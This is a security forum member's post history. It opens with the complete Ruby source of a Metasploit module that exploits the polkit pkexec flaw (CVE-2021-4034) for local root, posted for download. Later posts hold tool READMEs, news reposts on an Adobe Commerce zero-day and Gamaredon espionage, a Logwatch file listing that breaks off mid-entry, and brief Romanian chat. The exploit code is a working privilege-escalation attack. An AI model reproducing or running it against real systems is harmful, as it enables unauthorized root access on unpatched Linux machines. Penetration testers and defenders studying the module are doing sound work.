Jump to content

Kev

Active Members
 View Profile  See their activity

  • Posts

    1026

  • Joined

  • Days Won

    55

 Content Type 

Everything posted by Kev

  1. Kev
    This is a Metasploit module for the argument processing bug in the polkit pkexec binary. If the binary is provided with no arguments, it will continue to process environment variables as argument variables, but without any security checking. By using the execve call we can specify a null argument list and populate the proper environment variables. This exploit is architecture independent. Download: ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::Kernel include Msf::Post::Linux::System include Msf::Exploit::EXE include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Local Privilege Escalation in polkits pkexec', 'Description' => %q{ A bug exists in the polkit pkexec binary in how it processes arguments. If the binary is provided with no arguments, it will continue to process environment variables as argument variables, but without any security checking. By using the execve call we can specify a null argument list and populate the proper environment variables. This exploit is architecture independent. }, 'License' => MSF_LICENSE, 'Author' => [ 'Qualys Security', # Original vulnerability discovery 'Andris Raugulis', # Exploit writeup and PoC 'Dhiraj Mishra', # Metasploit Module 'bwatters-r7' # Metasploit Module ], 'DisclosureDate' => '2022-01-25', 'Platform' => [ 'linux' ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [ [ 'x86_64', { 'Arch' => [ ARCH_X64 ] } ], [ 'x86', { 'Arch' => [ ARCH_X86 ] } ], [ 'aarch64', { 'Arch' => [ ARCH_AARCH64 ] } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'PrependSetgid' => true, 'PrependSetuid' => true }, 'Privileged' => true, 'References' => [ [ 'CVE', '2021-4034' ], [ 'URL', 'https://www.whitesourcesoftware.com/resources/blog/polkit-pkexec-vulnerability-cve-2021-4034/' ], [ 'URL', 'https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt' ], [ 'URL', 'https://github.com/arthepsy/CVE-2021-4034' ], # PoC Reference [ 'URL', 'https://www.ramanean.com/script-to-detect-polkit-vulnerability-in-redhat-linux-systems-pwnkit/' ], # Vuln versions [ 'URL', 'https://github.com/cyberark/PwnKit-Hunter/blob/main/CVE-2021-4034_Finder.py' ] # vuln versions ], 'Notes' => { 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK ] } ) ) register_options([ OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ]), OptString.new('PKEXEC_PATH', [ false, 'The path to pkexec binary', '' ]) ]) register_advanced_options([ OptString.new('FinalDir', [ true, 'A directory to move to after the exploit completes', '/' ]), ]) end def on_new_session(new_session) # The directory the payload launches in gets deleted and breaks some commands # unless we change into a directory that exists super old_session = @session @session = new_session cd(datastore['FinalDir']) @session = old_session end def find_pkexec vprint_status('Locating pkexec...') if exists?(pkexec = cmd_exec('which pkexec')) vprint_status("Found pkexec here: #{pkexec}") return pkexec end return nil end def check # Is the arch supported? arch = kernel_hardware unless arch.include?('x86_64') || arch.include?('aarch64') || arch.include?('x86') return CheckCode::Safe("System architecture #{arch} is not supported") end # check the binary pkexec_path = datastore['PKEXEC_PATH'] pkexec_path = find_pkexec if pkexec_path.empty? return CheckCode::Safe('The pkexec binary was not found; try populating PkexecPath') if pkexec_path.nil? # we don't use the reported version, but it can help with troubleshooting version_output = cmd_exec("#{pkexec_path} --version") version_array = version_output.split(' ') if version_array.length > 2 pkexec_version = Rex::Version.new(version_array[2]) vprint_status("Found pkexec version #{pkexec_version}") end return CheckCode::Safe('The pkexec binary setuid is not set') unless setuid?(pkexec_path) # Grab the package version if we can to help troubleshoot sysinfo = get_sysinfo begin if sysinfo[:distro] =~ /[dD]ebian/ vprint_status('Determined host os is Debian') package_data = cmd_exec('dpkg -s policykit-1') pulled_version = package_data.scan(/Version:\s(.*)/)[0][0] vprint_status("Polkit package version = #{pulled_version}") end if sysinfo[:distro] =~ /[uU]buntu/ vprint_status('Determined host os is Ubuntu') package_data = cmd_exec('dpkg -s policykit-1') pulled_version = package_data.scan(/Version:\s(.*)/)[0][0] vprint_status("Polkit package version = #{pulled_version}") end if sysinfo[:distro] =~ /[cC]entos/ vprint_status('Determined host os is CentOS') package_data = cmd_exec('rpm -qa | grep polkit') vprint_status("Polkit package version = #{package_data}") end rescue StandardError => e vprint_status("Caught exception #{e} Attempting to retrieve polkit package value.") end if sysinfo[:distro] =~ /[fF]edora/ # Fedora should be supported, and it passes the check otherwise, but it just # does not seem to work. I am not sure why. I have tried with SeLinux disabled. return CheckCode::Safe('Fedora is not supported') end # run the exploit in check mode if everything looks right if run_exploit(true) return CheckCode::Vulnerable end return CheckCode::Safe('The target does not appear vulnerable') end def find_exec_program return 'python' if command_exists?('python') return 'python3' if command_exists?('python3') return nil end def run_exploit(check) if is_root? && !datastore['ForceExploit'] fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' end arch = kernel_hardware vprint_status("Detected architecture: #{arch}") if (arch.include?('x86_64') && payload.arch.first.include?('aarch')) || (arch.include?('aarch') && !payload.arch.first.include?('aarch')) fail_with(Failure::BadConfig, 'Host/payload Mismatch; set target and select matching payload') end pkexec_path = datastore['PKEXEC_PATH'] if pkexec_path.empty? pkexec_path = find_pkexec end python_binary = find_exec_program # Do we have the pkexec binary? if pkexec_path.nil? fail_with Failure::NotFound, 'The pkexec binary was not found; try populating PkexecPath' end # Do we have the python binary? if python_binary.nil? fail_with Failure::NotFound, 'The python binary was not found; try populating PythonPath' end unless writable? datastore['WRITABLE_DIR'] fail_with Failure::BadConfig, "#{datastore['WRITABLE_DIR']} is not writable" end local_dir = ".#{Rex::Text.rand_text_alpha_lower(6..12)}" working_dir = "#{datastore['WRITABLE_DIR']}/#{local_dir}" mkdir(working_dir) register_dir_for_cleanup(working_dir) random_string_1 = Rex::Text.rand_text_alpha_lower(6..12).to_s random_string_2 = Rex::Text.rand_text_alpha_lower(6..12).to_s @old_wd = pwd cd(working_dir) cmd_exec('mkdir -p GCONV_PATH=.') cmd_exec("touch GCONV_PATH=./#{random_string_1}") cmd_exec("chmod a+x GCONV_PATH=./#{random_string_1}") cmd_exec("mkdir -p #{random_string_1}") payload_file = "#{working_dir}/#{random_string_1}/#{random_string_1}.so" unless check upload_and_chmodx(payload_file.to_s, generate_payload_dll) register_file_for_cleanup(payload_file) end exploit_file = "#{working_dir}/.#{Rex::Text.rand_text_alpha_lower(6..12)}" write_file(exploit_file, exploit_data('CVE-2021-4034', 'cve_2021_4034.py')) register_file_for_cleanup(exploit_file) cmd = "#{python_binary} #{exploit_file} #{pkexec_path} #{payload_file} #{random_string_1} #{random_string_2}" print_warning("Verify cleanup of #{working_dir}") vprint_status("Running #{cmd}") output = cmd_exec(cmd) # Return to the old working directory before we delete working_directory cd(@old_wd) cmd_exec("rm -rf #{working_dir}") vprint_status(output) unless output.empty? # Return proper value if we are using exploit-as-a-check if check return false if output.include?('pkexec --version') return true end end def exploit run_exploit(false) end end Source
  2. Kev
    WIK wik is command based wiki. It let you search for any wikipedia up to date article on one query to your terminal. Requirements Python3 beautifulsoup4 Installation Linux From Source sudo pip3 install beautifulsoup4 flit_core git clone https://github.com/yashsinghcodes/wik.git cd wik sudo pip3 install . PYPI sudo pip3 install wik Windows From Source pip install beautifulsoup4 flit_core git clone https://github.com/yashsinghcodes/wik.git cd wik pip install . PYPI pip install wik Options Using wik is acutally really simple. usage: wik [-h] [-s SEARCH] [-i INFO] [-q QUICK] optional arguments: -h, --help show this help message and exit -s SEARCH, --search SEARCH Search any topic -i INFO, --info INFO Get info on any topic(Use correct name) -q QUICK, --quick QUICK Get the summary on any topic Example $ wik -q Linux Contribution You can contribute to the project by opening a issue if you face any or making a pull requests, if you think you can fix somthing or make improvment on the code. If you have some ideas related to the project you can contact me. Want to work with me? This is the task list if you think you can implement any please make a pull request. Download: wik-main.zip or git clone https://github.com/yashsinghcodes/wik.git Source
  3. Kev
    Kamarazi, poti da T/C, merći
  4. Kev
    Salut, stie cineva cum se numeste sau unde pot gasi detergent pentru uniformele de politie? PS: nu miros a Ariel.
  5. Kev
    For Reverse engineering It's your decision. by the way...
  6. Kev
    Back-up before reset
  7. Kev
    Adobe says the vulnerability is being used in attacks targeting Adobe Commerce users. Adobe has released an emergency patch to tackle a critical bug that is being exploited in the wild. On February 13, the tech giant said that the vulnerability impacts Adobe Commerce and Magento Open Source, and according to the firm's threat data, the security flaw is being weaponized "in very limited attacks targeting Adobe Commerce merchants." Tracked as CVE-2022-24086, the vulnerability has been issued a CVSS severity score of 9.8 out of 10, the maximum severity rating possible. The vulnerability is an improper input validation issue, described by the Common Weakness Enumeration (CWE) category system as a bug that occurs when a "product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly." CVE-2022-24086 does not require any administrator privileges to trigger. Adobe says the critical, pre-auth bug can be exploited in order to execute arbitrary code. As the vulnerability is severe enough to warrant an emergency patch, the company has not released any technical details, which gives customers time to accept fixes and mitigates further risks of exploit. The bug impacts Adobe Commerce (2.3.3-p1-2.3.7-p2) and Magento Open Source (2.4.0-2.4.3-p1), as well as earlier versions. Adobe's patches can be downloaded and manually applied here. Earlier this month, Adobe issued security updates for products including Premiere Rush, Illustrator, and Creative Cloud. The patch round tackled vulnerabilities leading to arbitrary code execution, denial-of-service (DoS), and privilege escalation, among other issues. Last week, Apple released a fix in iOS 15.3.1 to squash a vulnerability in Apple's Safari browser that could be exploited for arbitrary code execution. In February's Patch Tuesday, Microsoft resolved 48 vulnerabilities including one publicly-known zero-day security flaw. Via zdnet.com
  8. Kev
    Au "pi2de" in phone shop. on: categorie gresita PS: grije cu bancile
  9. Kev
    stai relax, nu moare.
  10. Kev
    About YouTube Timestamps extension shows timestamps from comments on timeline. Get it Chrome Firefox Diwnload youtube-timestamps-master.zip or git clone https://github.com/ris58h/youtube-timestamps.git Source
  11. Kev
    Microsoft on Friday shared more of the tactics, techniques, and procedures (TTPs) adopted by the Russia-based Gamaredon hacking group to facilitate a barrage of cyber espionage attacks aimed at several entities in Ukraine over the past six months. The attacks are said to have singled out government, military, non-government organizations (NGO), judiciary, law enforcement, and non-profit organizations with the main goal of exfiltrating sensitive information, maintaining access, and leveraging it to move laterally into related organizations. The Windows maker's Threat Intelligence Center (MSTIC) is tracking the cluster under the moniker ACTINIUM (previously as DEV-0157), sticking to its tradition of identifying nation-state activities by chemical element names. The Ukrainian government, in November 2021, publicly attributed Gamaredon to the Russian Federal Security Service (FSB) and connected its operations to the FSB Office of Russia in the Republic of Crimea and the city of Sevastopol. It's worth pointing out that the Gamaredon threat group represents a unique set of attacks divorced from last month's cyber offensives that knocked out multiple Ukrainegovernment agencies and corporate entities with destructive data-wiping malware disguised as ransomware. The attacks primarily leverage spear-phishing emails as an initial access vector, with the messages carrying malware-laced macro attachments that employ remote templates containing malicious code when the recipients open the rigged documents. In an interesting tactic, the operators also embed a tracking pixel-like "web bug" within the body of the phishing message to monitor if a message has been opened, following which, the infection chain triggers a multi-stage process that culminates in the deployment of several binaries, including — PowerPunch – A PowerShell-based dropper and downloader used to retrieve the next-stage executables remotely Pterodo – A constantly evolving feature-rich backdoor that also sports a range of capabilities intended to make analysis more difficult, and QuietSieve – A heavily-obfuscated .NET binary specifically geared towards data exfiltration and reconnaissance on the target host This is far from the only intrusion staged by the threat actor, which also struck an unnamed Western government organization in Ukraine last month via a malware-laced resume for an active job listing with the entity posted on a local job portal. It also targeted the country's State Migration Service (SMS) in December 2021. The findings also arrive as Cisco Talos, in its continuing analysis of the January incidents, disclosed details of an ongoing disinformation campaign attempting to attribute the defacement and wiper attacks to Ukrainian groups that date back at least nine months. Via thehackernews.com
  12. Kev
    Logwatch analyzes and reports on unix system logs. It is a customizable and pluggable log monitoring system which will go through the logs for a given period of time and make a customizable report. It should work right out of the package on most systems. Content: Directory of logwatch-7.6.tar\logwatch-7.6\logwatch-7.6 01/25/2022 11:44 AM <DIR> . 01/25/2022 11:44 AM <DIR> .. 01/22/2022 02:00 AM 33,703 amavis-logwatch.1 01/22/2022 02:00 AM <DIR> conf 01/22/2022 02:00 AM 24,358 howto-customize-logwatch 01/22/2022 02:00 AM 24 ignore.conf.5 01/22/2022 02:00 AM 11,461 install_logwatch.sh 01/22/2022 02:00 AM <DIR> lib 01/22/2022 02:00 AM 1,060 license 01/22/2022 02:00 AM 5,527 logwatch.8 01/22/2022 02:00 AM 1,002 logwatch.conf.5 01/22/2022 02:00 AM 6,555 logwatch.spec 01/22/2022 02:00 AM 25 override.conf.5 01/22/2022 02:00 AM 36,105 postfix-logwatch.1 01/25/2022 11:43 AM 37,158 print.txt 01/25/2022 11:44 AM 0 print1.txt 01/22/2022 02:00 AM 3,618 readme 01/22/2022 02:00 AM <DIR> scheduler 01/22/2022 02:00 AM <DIR> scripts 13 File(s) 160,596 bytes Directory of logwatch-7.6.tar\logwatch-7.6\logwatch-7.6\conf 01/22/2022 02:00 AM <DIR> . 01/22/2022 02:00 AM <DIR> .. 01/22/2022 02:00 AM <DIR> html 01/22/2022 02:00 AM 969 ignore.conf 01/22/2022 02:00 AM <DIR> logfiles 01/22/2022 02:00 AM 6,349 logwatch.conf 01/22/2022 02:00 AM <DIR> services 2 File(s) 7,318 bytes Directory of logwatch-7.6.tar\logwatch-7.6\logwatch-7.6\conf\html 01/22/2022 02:00 AM <DIR> . 01/22/2022 02:00 AM <DIR> .. 01/22/2022 02:00 AM 1,180 footer.html 01/22/2022 02:00 AM 1,145 header.html 2 File(s) 2,325 bytes Directory of logwatch-7.6.tar\logwatch-7.6\logwatch-7.6\conf\logfiles 01/22/2022 02:00 AM <DIR> . 01/22/2022 02:00 AM <DIR> .. 01/22/2022 02:00 AM 645 audit_log.conf 01/22/2022 02:00 AM 572 autorpm.conf 01/22/2022 02:00 AM 447 bfd.conf 01/22/2022 02:00 AM 960 cisco.conf 01/22/2022 02:00 AM 788 citadel.conf 01/22/2022 02:00 AM 2,344 clam-update.conf 01/22/2022 02:00 AM 840 clamav.conf 01/22/2022 02:00 AM 835 cron.conf 01/22/2022 02:00 AM 953 daemon.conf 01/22/2022 02:00 AM 467 denyhosts.conf 01/22/2022 02:00 AM 232 dirsrv.conf 01/22/2022 02:00 AM 304 dnf-rpm.conf 01/22/2022 02:00 AM 2,781 dnssec.conf 01/22/2022 02:00 AM 72 dovecot.conf 01/22/2022 02:00 AM 817 dpkg.conf 01/22/2022 02:00 AM 894 emerge.conf 01/22/2022 02:00 AM 1,434 eventlog.conf 01/22/2022 02:00 AM 1,143 exim.conf 01/22/2022 02:00 AM 992 extreme-networks.conf 01/22/2022 02:00 AM 914 fail2ban.conf 01/22/2022 02:00 AM 665 freeradius.conf 01/22/2022 02:00 AM 346 http-error.conf 01/22/2022 02:00 AM 1,317 http.conf 01/22/2022 02:00 AM 820 iptables.conf 01/22/2022 02:00 AM 944 kernel.conf 01/22/2022 02:00 AM 1,131 maillog.conf 01/22/2022 02:00 AM 1,136 messages.conf 01/22/2022 02:00 AM 686 mysql-mmm.conf 01/22/2022 02:00 AM 471 mysql.conf 01/22/2022 02:00 AM 1,015 netopia.conf 01/22/2022 02:00 AM 1,021 netscreen.conf 01/22/2022 02:00 AM 1,305 php.conf 01/22/2022 02:00 AM 442 pix.conf 01/22/2022 02:00 AM 988 postgresql.conf 01/22/2022 02:00 AM 861 pureftp.conf 01/22/2022 02:00 AM 556 qmail-pop3d-current.conf 01/22/2022 02:00 AM 559 qmail-pop3ds-current.conf 01/22/2022 02:00 AM 543 qmail-send-current.conf 01/22/2022 02:00 AM 556 qmail-smtpd-current.conf 01/22/2022 02:00 AM 2,837 resolver.conf 01/22/2022 02:00 AM 201 rsnapshot.conf 01/22/2022 02:00 AM 564 rt314.conf 01/22/2022 02:00 AM 645 samba.conf 01/22/2022 02:00 AM 1,094 secure.conf 01/22/2022 02:00 AM 1,028 sonicwall.conf 01/22/2022 02:00 AM 1,240 spamassassin.conf 01/22/2022 02:00 AM 1,180 syslog.conf 01/22/2022 02:00 AM 406 tac_acc.conf 01/22/2022 02:00 AM 833 tivoli-smc.conf 01/22/2022 02:00 AM 771 up2date.conf 01/22/2022 02:00 AM 628 vdr.conf 01/22/2022 02:00 AM 850 vsftpd.conf 01/22/2022 02:00 AM 1,041 windows.conf 01/22/2022 02:00 AM 818 xferlog.conf 01/22/2022 02:00 AM 132 yum.conf 01/22/2022 02:00 AM 562 zypp.conf 56 File(s) 48,626 bytes Directory of logwatch-7.6.tar\logwatch-7.6\logwatch-7.6\conf\services 01/22/2022 02:00 AM <DIR> . 01/22/2022 02:00 AM <DIR> .. 01/22/2022 02:00 AM 683 afpd.conf 01/22/2022 02:00 AM 7,482 amavis.conf 01/22/2022 02:00 AM 693 arpwatch.conf 01/22/2022 02:00 AM 1,253 audit.conf 01/22/2022 02:00 AM 974 automount.conf 01/22/2022 02:00 AM 873 autorpm.conf 01/22/2022 02:00 AM 528 barracuda.conf 01/22/2022 02:00 AM 452 bfd.conf 01/22/2022 02:00 AM 870 cisco.conf 01/22/2022 02:00 AM 1,002 citadel.conf 01/22/2022 02:00 AM 1,942 clam-update.conf 01/22/2022 02:00 AM 571 clamav-milter.conf 01/22/2022 02:00 AM 752 clamav.conf 01/22/2022 02:00 AM 1,759 courier.conf 01/22/2022 02:00 AM 867 cron.conf 01/22/2022 02:00 AM 428 denyhosts.conf 01/22/2022 02:00 AM 962 dhcpd.conf 01/22/2022 02:00 AM 499 dirsrv.conf 01/22/2022 02:00 AM 95 dnf-rpm.conf 01/22/2022 02:00 AM 2,662 dnssec.conf 01/22/2022 02:00 AM 1,147 dovecot.conf 01/22/2022 02:00 AM 783 dpkg.conf 01/22/2022 02:00 AM 645 emerge.conf 01/22/2022 02:00 AM 1,436 evtapplication.conf 01/22/2022 02:00 AM 1,063 evtsecurity.conf 01/22/2022 02:00 AM 1,057 evtsystem.conf 01/22/2022 02:00 AM 956 exim.conf 01/22/2022 02:00 AM 1,113 eximstats.conf 01/22/2022 02:00 AM 892 extreme-networks.conf 01/22/2022 02:00 AM 1,402 fail2ban.conf 01/22/2022 02:00 AM 872 fetchmail.conf 01/22/2022 02:00 AM 666 freeradius.conf 01/22/2022 02:00 AM 1,008 ftpd-messages.conf 01/22/2022 02:00 AM 962 ftpd-xferlog.conf 01/22/2022 02:00 AM 2,115 http-error.conf 01/22/2022 02:00 AM 3,469 http.conf 01/22/2022 02:00 AM 953 identd.conf 01/22/2022 02:00 AM 904 imapd.conf 01/22/2022 02:00 AM 987 in.qpopper.conf 01/22/2022 02:00 AM 959 init.conf 01/22/2022 02:00 AM 850 ipop3d.conf 01/22/2022 02:00 AM 1,605 iptables.conf 01/22/2022 02:00 AM 1,485 kernel.conf 01/22/2022 02:00 AM 944 knockd.conf 01/22/2022 02:00 AM 989 lvm.conf 01/22/2022 02:00 AM 1,006 mailscanner.conf 01/22/2022 02:00 AM 829 mdadm.conf 01/22/2022 02:00 AM 971 modprobe.conf 01/22/2022 02:00 AM 624 mod_security2.conf 01/22/2022 02:00 AM 965 mountd.conf 01/22/2022 02:00 AM 631 mysql-mmm.conf 01/22/2022 02:00 AM 154 mysql.conf 01/22/2022 02:00 AM 1,186 named.conf 01/22/2022 02:00 AM 923 netopia.conf 01/22/2022 02:00 AM 878 netscreen.conf 01/22/2022 02:00 AM 577 nut.conf 01/22/2022 02:00 AM 694 oidentd.conf 01/22/2022 02:00 AM 648 omsa.conf 01/22/2022 02:00 AM 748 openvpn.conf 01/22/2022 02:00 AM 956 pam.conf 01/22/2022 02:00 AM 971 pam_pwdb.conf 01/22/2022 02:00 AM 892 pam_unix.conf 01/22/2022 02:00 AM 834 php.conf 01/22/2022 02:00 AM 422 pix.conf 01/22/2022 02:00 AM 303 pluto.conf 01/22/2022 02:00 AM 931 pop3.conf 01/22/2022 02:00 AM 979 portsentry.conf 01/22/2022 02:00 AM 12,814 postfix.conf 01/22/2022 02:00 AM 886 postgresql.conf 01/22/2022 02:00 AM 1,099 pound.conf 01/22/2022 02:00 AM 1,135 proftpd-messages.conf 01/22/2022 02:00 AM 937 puppet.conf 01/22/2022 02:00 AM 966 pureftpd.conf 01/22/2022 02:00 AM 1,798 qmail-pop3d.conf 01/22/2022 02:00 AM 1,801 qmail-pop3ds.conf 01/22/2022 02:00 AM 2,022 qmail-send.conf 01/22/2022 02:00 AM 3,938 qmail-smtpd.conf 01/22/2022 02:00 AM 1,816 qmail.conf 01/22/2022 02:00 AM 170 raid.conf 01/22/2022 02:00 AM 2,675 resolver.conf 01/22/2022 02:00 AM 310 rsnapshot.conf 01/22/2022 02:00 AM 1,007 rsyslogd.conf 01/22/2022 02:00 AM 229 rt314.conf 01/22/2022 02:00 AM 869 samba.conf 01/22/2022 02:00 AM 926 saslauthd.conf 01/22/2022 02:00 AM 1,082 scsi.conf 01/22/2022 02:00 AM 1,571 secure.conf 01/22/2022 02:00 AM 1,311 sendmail-largeboxes.conf 01/22/2022 02:00 AM 7,383 sendmail.conf 01/22/2022 02:00 AM 696 shaperd.conf 01/22/2022 02:00 AM 1,268 slon.conf 01/22/2022 02:00 AM 689 smartd.conf 01/22/2022 02:00 AM 956 sonicwall.conf 01/22/2022 02:00 AM 584 spamassassin.conf 01/22/2022 02:00 AM 2,077 sshd.conf 01/22/2022 02:00 AM 962 sshd2.conf 01/22/2022 02:00 AM 813 sssd.conf 01/22/2022 02:00 AM 824 stunnel.conf 01/22/2022 02:00 AM 862 sudo.conf 01/22/2022 02:00 AM 1,007 syslog-ng.conf 01/22/2022 02:00 AM 968 syslogd.conf 01/22/2022 02:00 AM 910 systemd.conf 01/22/2022 02:00 AM 569 tac_acc.conf 01/22/2022 02:00 AM 621 tivoli-smc.conf 01/22/2022 02:00 AM 881 up2date.conf 01/22/2022 02:00 AM 869 vdr.conf 01/22/2022 02:00 AM 760 vpopmail.conf 01/22/2022 02:00 AM 846 vsftpd.conf 01/22/2022 02:00 AM 1,163 windows.conf 01/22/2022 02:00 AM 992 xntpd.conf 01/22/2022 02:00 AM 87 yum.conf 01/22/2022 02:00 AM 605 zypp.conf 01/22/2022 02:00 AM 1,979 zz-disk_space.conf 01/22/2022 02:00 AM 1,111 zz-lm_sensors.conf 01/22/2022 02:00 AM 1,206 zz-network.conf 01/22/2022 02:00 AM 684 zz-runtime.conf 01/22/2022 02:00 AM 965 zz-sys.conf 01/22/2022 02:00 AM 866 zz-zfs.conf 118 File(s) 145,296 bytes Directory of logwatch-7.6.tar\logwatch-7.6\logwatch-7.6\lib 01/22/2022 02:00 AM <DIR> . 01/22/2022 02:00 AM <DIR> .. 01/22/2022 02:00 AM 18,663 logwatch.pm 1 File(s) 18,663 bytes Directory of logwatch-7.6.tar\logwatch-7.6\logwatch-7.6\scheduler 01/22/2022 02:00 AM <DIR> . 01/22/2022 02:00 AM <DIR> .. 01/22/2022 02:00 AM 482 logwatch.cron 01/22/2022 02:00 AM 491 logwatch.service 01/22/2022 02:00 AM 181 logwatch.timer 01/22/2022 02:00 AM 498 systemd.conf 4 File(s) 1,652 bytes Directory of logwatch-7.6.tar\logwatch-7.6\logwatch-7.6\scripts 01/22/2022 02:00 AM <DIR> . 01/22/2022 02:00 AM <DIR> .. 01/22/2022 02:00 AM <DIR> logfiles 01/22/2022 02:00 AM 60,456 logwatch.pl 01/22/2022 02:00 AM <DIR> services 01/22/2022 02:00 AM <DIR> shared 1 File(s) 60,456 bytes Directory of logwatch-7.6.tar\logwatch-7.6\logwatch-7.6\scripts\logfiles 01/22/2022 02:00 AM <DIR> . 01/22/2022 02:00 AM <DIR> .. 01/22/2022 02:00 AM <DIR> autorpm 01/22/2022 02:00 AM <DIR> cron 01/22/2022 02:00 AM <DIR> emerge 01/22/2022 02:00 AM <DIR> samba 01/22/2022 02:00 AM <DIR> up2date 01/22/2022 02:00 AM <DIR> xferlog 01/22/2022 02:00 AM <DIR> yum 0 File(s) 0 bytes Directory of logwatch-7.6.tar\logwatch-7.6\logwatch-7.6\scripts\logfiles\autorpm 01/22/2022 02:00 AM <DIR> . 01/22/2022 02:00 AM <DIR> .. 01/22/2022 02:00 AM 1,542 applydate 1 File(s) 1,542 bytes Directory of logwatch-7.6.tar\logwatch-7.6\logwatch-7.6\scripts\logfiles\cron 01/22/2022 02:00 AM <DIR> . 01/22/2022 02:00 AM <DIR> .. 01/22/2022 02:00 AM 2,525 applydate 1 File(s) 2,525 bytes Directory of logwatch-7.6.tar\logwatch-7.6\logwatch-7.6\scripts\logfiles\emerge 01/22/2022 02:00 AM <DIR> . 01/22/2022 02:00 AM <DIR> .. 01/22/2022 02:00 AM 2,847 applydate 1 File(s) 2,847 bytes Directory of logwatch-7.6.tar\logwatch-7.6\logwatch-7.6\scripts\logfiles\samba 01/22/2022 02:00 AM <DIR> . 01/22/2022 02:00 AM <DIR> .. 01/22/2022 02:00 AM 2,357 applydate 01/22/2022 02:00 AM 1,565 removeheaders 2 File(s) 3,922 bytes Directory of logwatch-7.6.tar\logwatch-7.6\logwatch-7.6\scripts\logfiles\up2date 01/22/2022 02:00 AM <DIR> . 01/22/2022 02:00 AM <DIR> .. 01/22/2022 02:00 AM 1,548 applydate 01/22/2022 02:00 AM 1,253 removeheaders 2 File(s) 2,801 bytes Directory of logwatch-7.6.tar\logwatch-7.6\logwatch-7.6\scripts\logfiles\xferlog 01/22/2022 02:00 AM <DIR> . 01/22/2022 02:00 AM <DIR> .. 01/22/2022 02:00 AM 1,546 applydate 01/22/2022 02:00 AM 1,255 removeheaders 2 File(s) 2,801 bytes Directory of logwatch-7.6.tar\logwatch-7.6\logwatch-7.6\scripts\logfiles\yum 01/22/2022 02:00 AM <DIR> . 01/22/2022 02:00 AM <DIR> .. 01/22/2022 02:00 AM 1,781 applydate 1 File(s) 1,781 bytes Directory of logwatch-7.6.tar\logwatch-7.6\logwatch-7.6\scripts\services 01/22/2022 02:00 AM <DIR> . 01/22/2022 02:00 AM <DIR> .. 01/22/2022 02:00 AM 4,169 afpd 01/22/2022 02:00 AM 180,974 amavis 01/22/2022 02:00 AM 1,678 arpwatch 01/22/2022 02:00 AM 15,958 audit 01/22/2022 02:00 AM 5,678 automount 01/22/2022 02:00 AM 2,317 autorpm 01/22/2022 02:00 AM 13,014 barracuda 01/22/2022 02:00 AM 2,126 bfd 01/22/2022 02:00 AM 48,088 cisco 01/22/2022 02:00 AM 60,212 citadel 01/22/2022 02:00 AM 7,720 clam-update 01/22/2022 02:00 AM 6,882 clamav 01/22/2022 02:00 AM 4,958 clamav-milter 01/22/2022 02:00 AM 23,615 courier 01/22/2022 02:00 AM 14,593 cron 01/22/2022 02:00 AM 1,701 denyhosts 01/22/2022 02:00 AM 13,379 dhcpd 01/22/2022 02:00 AM 7,144 dirsrv 01/22/2022 02:00 AM 5,314 dnf-rpm 01/22/2022 02:00 AM 5,154 dnssec 01/22/2022 02:00 AM 27,571 dovecot 01/22/2022 02:00 AM 2,711 dpkg 01/22/2022 02:00 AM 5,118 emerge 01/22/2022 02:00 AM 8,677 evtapplication 01/22/2022 02:00 AM 7,826 evtmswindows 01/22/2022 02:00 AM 15,319 evtsecurity 01/22/2022 02:00 AM 15,959 evtsystem 01/22/2022 02:00 AM 29,937 exim 01/22/2022 02:00 AM 2,199 eximstats 01/22/2022 02:00 AM 12,296 extreme-networks 01/22/2022 02:00 AM 12,373 fail2ban 01/22/2022 02:00 AM 3,869 fetchmail 01/22/2022 02:00 AM 11,259 freeradius 01/22/2022 02:00 AM 8,379 ftpd-messages 01/22/2022 02:00 AM 6,797 ftpd-xferlog 01/22/2022 02:00 AM 25,205 http 01/22/2022 02:00 AM 4,659 http-error 01/22/2022 02:00 AM 6,087 identd 01/22/2022 02:00 AM 13,077 imapd 01/22/2022 02:00 AM 5,374 in.qpopper 01/22/2022 02:00 AM 3,985 init 01/22/2022 02:00 AM 3,986 ipop3d 01/22/2022 02:00 AM 15,750 iptables 01/22/2022 02:00 AM 10,960 kernel 01/22/2022 02:00 AM 2,605 knockd 01/22/2022 02:00 AM 6,100 lvm 01/22/2022 02:00 AM 29,865 mailscanner 01/22/2022 02:00 AM 4,576 mdadm 01/22/2022 02:00 AM 3,495 modprobe 01/22/2022 02:00 AM 7,808 mod_security2 01/22/2022 02:00 AM 4,861 mountd 01/22/2022 02:00 AM 5,012 mysql 01/22/2022 02:00 AM 5,192 mysql-mmm 01/22/2022 02:00 AM 41,388 named 01/22/2022 02:00 AM 16,566 netopia 01/22/2022 02:00 AM 22,694 netscreen 01/22/2022 02:00 AM 8,347 nut 01/22/2022 02:00 AM 4,714 oidentd 01/22/2022 02:00 AM 5,830 omsa 01/22/2022 02:00 AM 17,671 openvpn 01/22/2022 02:00 AM 2,138 pam 01/22/2022 02:00 AM 8,686 pam_pwdb 01/22/2022 02:00 AM 13,706 pam_unix 01/22/2022 02:00 AM 5,200 php 01/22/2022 02:00 AM 13,948 pix 01/22/2022 02:00 AM 12,497 pluto 01/22/2022 02:00 AM 16,479 pop3 01/22/2022 02:00 AM 5,682 portsentry 01/22/2022 02:00 AM 249,530 postfix 01/22/2022 02:00 AM 5,767 postgresql 01/22/2022 02:00 AM 3,975 pound 01/22/2022 02:00 AM 10,032 proftpd-messages 01/22/2022 02:00 AM 11,359 puppet 01/22/2022 02:00 AM 7,621 pureftpd 01/22/2022 02:00 AM 6,473 qmail 01/22/2022 02:00 AM 4,687 qmail-pop3d 01/22/2022 02:00 AM 4,176 qmail-pop3ds 01/22/2022 02:00 AM 20,441 qmail-send 01/22/2022 02:00 AM 60,328 qmail-smtpd 01/22/2022 02:00 AM 2,131 raid 01/22/2022 02:00 AM 3,560 resolver 01/22/2022 02:00 AM 4,343 